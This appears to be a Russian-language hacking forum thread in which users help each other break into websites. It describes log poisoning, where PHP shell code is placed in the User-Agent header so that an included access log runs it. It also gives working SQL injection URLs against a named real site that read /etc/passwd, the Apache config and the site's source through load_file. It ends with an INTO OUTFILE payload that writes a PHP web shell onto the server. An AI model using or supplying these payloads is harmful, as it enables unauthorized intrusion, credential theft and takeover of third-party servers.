Ваши вопросы по уязвимостям.

один раз получалось инклудить логи, в основном 3 проблемы
1) их хер найдёшь
2) если найдёшь, то скорее всего не будет прав на чтение
3) если повезёт и буду права, то файл будет размером под 3 гига +))

 

Ту же самую структуру я на десятках сайтах видел)

 

1) Денвер
2) Денвер
3) Общажная локалка

 

ну я какбэ говорил в большинстве случаев =\

 

3) в логи надо писать не весь шелл, а только код который будет подгружать код шелла в нужную диру. потом его и инклудить

 

С заливкой файлов облом.Скуль в принцепе тоже безполезна,т.к. пассов там нет, они хранятся хер знает где (где именно записано в конфиг.пхп((
А про то как в логи записать свой код можно по подробней?

 

Так я видать чего то не допонял) Сам access.log я нашел и успешно заинклудил но так и не понял чем мне он может помочь

 

Подставляй вместо своего юзер агента пхп код инклудящий шелл. Твой заход на сайт запишется в логи, и потом уже их инклудь. Самый простой вариант - скачай программу Minibrowser, там в настройках в поле для юзер агента впиши пхп код, и сделай несколько заходов с него на сайт.

 

http://www.xakep.ru/magazine/xa/101/086/1.asp

 

Попробывал.Ничего не вышло,поковырялся в логах, там походу агенты не сохраняются вобще.

 

помогите развить дальше
http://www.vodnik.info/article.php?aid=-1'+union+select+1,2,3,4,5,6,7,8,9+/*
с помощью такого запроса прочитад passwd http://www.vodnik.info/article.php?aid=-1'+union+select+1,load_file('/etc/passwd'),3,4,5,6,7,8,9+/*

конфиг апача - http://www.vodnik.info/article.php?aid=-1%27+union+select+1,load_file(%27/etc/httpd/conf/httpd.conf%27),3,4,5,6,7,8,9+/*
в нем виртуальные хосты в них дырок найти не смог.

узнав пути расположения сайтов на серваке попытался прочитать страницу http://www.vodnik.info/article.php?aid=-1%27+union+select+1,load_file(%27/home/vodnik/vodnik-www/login.php%27),3,4,5,6,7,8,9+/*
судя по исходному коду где то есть инклуды
include_once("includes.inc.php");
include_once("login_control.php");
как найти путь к ним?.. может я не то и нетам ищу?

 

frigid20, Это не инклюды, точнее инклюды, как функции, а не как уязвимость)

 

я не про то что уязвимость - инклуды а про то можно ли их прочитать.. судя по всему в них валяются данные базы

 

frigid20, а, ну да. Эти файлы лежать в той же папке, что и файл, в котором ты нашел эти инклюды.

 

по крайней мере через load_file они не читаются.. есть еще какие то способы?

 

frigid20, врятли =\ Щас поковыряю скулю, мож чего интересного найду

 

Ещё вопрос:

office_ausers

Встречал кто-нибудь такую ? Перепробывал уже во все формы вбивать оттуда пароли))

Поля:

1 : usr_id
2 : user_id
3 : usr_lname
4 : usr_fname
5 : usr_email
6 : usr_info
7 : usr_username
8 : usr_password
9 : usr_public
10 : usr_group

 

frigid20,

 

2Велемир дык в чем проблема то состоит тебе форму для аута нужно что ли найти ? Ну тогда если можно то линк сюда или в ПМ
2frigid20 у тебя ковычки не экраниються судя по запросу Залей через Into outfile шелл и будет тебе счастье )

 

2n0ne, спасибо
2MaSTeR GэN, на запрос вида http://www.vodnik.info/article.php?aid=-1'+select+'<? php system($cmd) ?>'+from+tbl_users+INTO+OUTFILE+'/home/vodnik/vodnik-www/yarobot.php'/* сайт зависает...